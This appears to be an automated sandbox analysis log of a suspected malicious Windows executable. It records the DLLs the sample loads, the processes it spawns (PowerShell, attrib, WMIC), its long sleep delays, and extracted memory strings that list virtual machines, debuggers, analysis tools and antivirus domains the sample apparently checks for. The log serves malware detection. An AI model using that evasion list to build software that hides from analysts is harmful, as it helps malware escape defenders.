Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll

Source: DmI602ZFyp.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x919600
Source: DmI602ZFyp.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x791000
Source: DmI602ZFyp.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x878600

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD33DCD2A5 pushad ; iretd	8_2_00007FFD33DCD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD33EE7BD6 push esp; ret	8_2_00007FFD33EE7BD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD33EE19DB pushad ; ret	8_2_00007FFD33EE19E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD33FB71C9 push ebx; retf	8_2_00007FFD33FB71CA

Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: attrib.exe
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: attrib.exe
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	Process created: attrib.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7075	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2696	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7982	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1688	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748	Thread sleep count: 7982 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752	Thread sleep count: 1688 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File Volume queried: C:\Users\user\Desktop FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe	File Volume queried: \Device\CdRom0\ FullSizeInformation			Jump to behavior

Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dlltext/plainuser32.dllFyne ErrorFYNE_SCALERightShiftRightSuperdwmapi.dllexecerrdotSYSTEMROOT for type cancel.svgdelete.svgsearch.svgfolder.svgupload.svglogout.svgmenuExpandcontentCutmediaMusicmediaPhotomediaVideomediaPausefolderOpenviewZoomInvisibilityvolumeDownvolumeMuteboldItalicBoldItalicFYNE_CACHEvmwaretrayxenservicevmwareusermegadumperscyllahidemcafee.comnorton.comzillya.comsophos.comclamav.netpowershellsystemrootShowWindowsystemdataLockFileExWSASocketWChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOld_UyghurPhoenicianSaurashtrahttp2debugcrypto/tlsimage: NewConnectionimage/webpimage/jpegUser-AgentRST_STREAMEND_STREAMSet-Cookie stream=%dset-cookieuser-agentkeep-alive:authorityconnectionHost: %s
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocsGODEBUG m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal file://LeftAltPATHEXTnumber confirmcheckedwarningarrowUphistorydesktopstorageaccountpressedsuccessregularRegularControlregeditollydbgdf5servvmusrvcqemu-gafakenetfiddlerdumpcapsharpodsnifferpetoolsharmonycharlesphantomx32_dbgx64_dbgwpe proavg.comCaption%.2f GBFloats:AvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaavx512fos/execruntimeNRGBA64UpgradeTrailerHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTcharsetnil keyfeatherIntegerFreeSidSleepExHeadingRawHTML%s%s {
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: BecauseCayleysCconintCedillaDiamondDownTeeElementImpliesLeftTeeNewLineNoBreakNotLessOverBarProductUpArrowUparrowangrtvbangzarrasympeqbacksimbecausebemptyvbetweenbigcircbigodotbigstarbnequivboxplusccupssmcemptyvcirscircoloneqcongdotcudarrlcudarrrcularrpcurarrmdbkarowddaggerddotseqdemptyvdiamonddigammadotplusdwangleeqcolonequivDDgesdotogtquestgtrlessharrcirintprodisindotlarrbfslarrsimlbrksldlbrksluldrdharlesdotolessdotlessgtrlesssimlotimesltquestluruharmalteseminusdunapproxnaturalnearrownexistsnotinvanotinvbnotinvcnotnivanotnivbnotnivcnpolintnpreceqnsqsubensqsupensubsetnsucceqnsupsetnvinfinnvltrienvrtrienwarrowolcrossorderoforslopepertenkplanckhpluscirplussimplustwoprecsimquatintquesteqrarrbfsrarrsimrbrksldrbrkslurdldharrealinerotimesruluharsearrowsimplussimrarrsubedotsubmultsubplussubrarrsuccsimsupdsubsupedotsuphsolsuphsubsuplarrsupmultsupplusswarrowtopforktriplustritimeuparrowuwanglevzigzagzigrarrfonnapado-hansdo-hantjy-hansjy-hantmn-hansmn-hantnp-hansnp-hantpx-hanspx-hantsp-hanssp-hantzh-hanszh-hantzo-hanszo-hantpolytonan-hansan-hantarevmdaak-hansak-hantsn-hanssn-hantprovencuu-hansuu-hantue-hanspdh.dll_pragmapragma _txlockSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:answers#intern{{end}} actioncommandoperandabl1943akuapemalalc97arevelaarkaikabalankabauddhabohoricemodenggrclassgrmistrhepburnitihasalaukikalemosinltg1929ltg2007metelkomonotonpahawh2pahawh3pahawh4sursilvsutsilvvaidika%s-%s%sAEsmallOEsmall001.000001.001001.002001.003crimsondarkreddimgraydimgreyfuchsiahotpinkmagentaoldlaceskybluethistleInstAltInstNopalt -> nop -> any -> EllipseEndPageFillRgnIsChildSetMenuSetRect_accessctime64wcsncpywcsrchrnil TLS2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsavegb18030logicalcskoi8rkoi8-rudos-874tis-620chinesegb_2312cn-big5cseuckrksc5601unicode]?)(.*)GB18030GoString01234567beEfFgGvThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOrundll32icon.pnggo-builddisabledtruncateFullPath48828125infinitystrconv.parsing ParseIntFuncTypestruct {nil PoolscavengepollDesctraceBufdeadlockraceFinipanicnilcgocheckrunnable procid rax rbx rcx rdx rdi rsi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15 rip rflags cs fs gs is not pointer packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdown Cause:KP_EnterRightAltCapsLockmenu.svginfo.svgfile.svghelp.svghome.svglist.svggrid.svgdocumentquestionmailSendfileTextsettingsvolumeUpdownloadcomputer%-13s %qvmtoolsdvboxtraypestudiovmacthlpksdumperdebuggerstrongodgraywolf0harmonyreversaleset.com-CommandDisabled0.0.0.0 USERNAMEfinishedwsaioctlacceptexArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiavx512bwavx512vlgo/typesnet/httpgo/
Source: DmI602ZFyp.exe, 00000000.00000002.2599795670.00000185569E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
